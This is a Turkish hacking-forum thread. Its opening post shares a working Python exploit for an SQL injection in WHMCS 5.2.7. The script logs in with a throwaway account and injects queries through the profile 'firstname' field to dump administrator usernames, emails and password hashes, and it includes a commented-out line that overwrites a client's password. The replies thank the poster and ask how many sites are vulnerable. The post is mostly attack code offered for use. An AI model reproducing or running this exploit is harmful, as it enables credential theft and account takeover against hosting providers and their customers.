Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WHMCS 5.2.7 SQL Injection
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
WHMCS 5.2.7 SQL Injection
21.04.2014 19:11
WHMCS 5.2.7 – SQL Injection açığnın kullanımana ilişkin youtube videoda kullanım şekli açıklanmıştır. Tam ekran olarak izlerseniz daha iyi görüntüleniyor. Açığı ilişkin python script ise şu şekilde;






Kod:
#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = '[email protected]' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    print "Doing stuff: %s" % sql
    r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
    return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
    print "Getting CSRF token"
    r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
    csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
    cookie = r.info()['set-cookie'].split(';')[0]
    print "Logging in"
    r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
    if 'dologin.php' in r:
        sys.exit('Unable to login')
    else:
        return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)
- See more at: http://www.seo.mavi1.org/whmcs-5-2-7-sql-injection-acigi.html#sthash.RK5sqeNw.dpuf


Alinti
H4Sec
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 26 / 298
Deneyim: 93 / 100
Rep Sayısı: 64
Mesaj Sayısı: 193
Üyelik Tarihi: 06.05.2013
     
Yorum: #2
Cvp: WHMCS 5.2.7 SQL Injection
29.05.2014 22:39
Elinize sağlık.

resim yükle
Alinti
linuxman
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 231
Deneyim: 26 / 100
Rep Sayısı: 4
Mesaj Sayısı: 126
Üyelik Tarihi: 13.04.2014
     
Yorum: #3
Cvp: WHMCS 5.2.7 SQL Injection
30.05.2014 19:23
benim izlerken dikkatimi çekti 2 sayfa vardı çok fazla site yok dogrumu?
Alinti



1 Ziyaretçi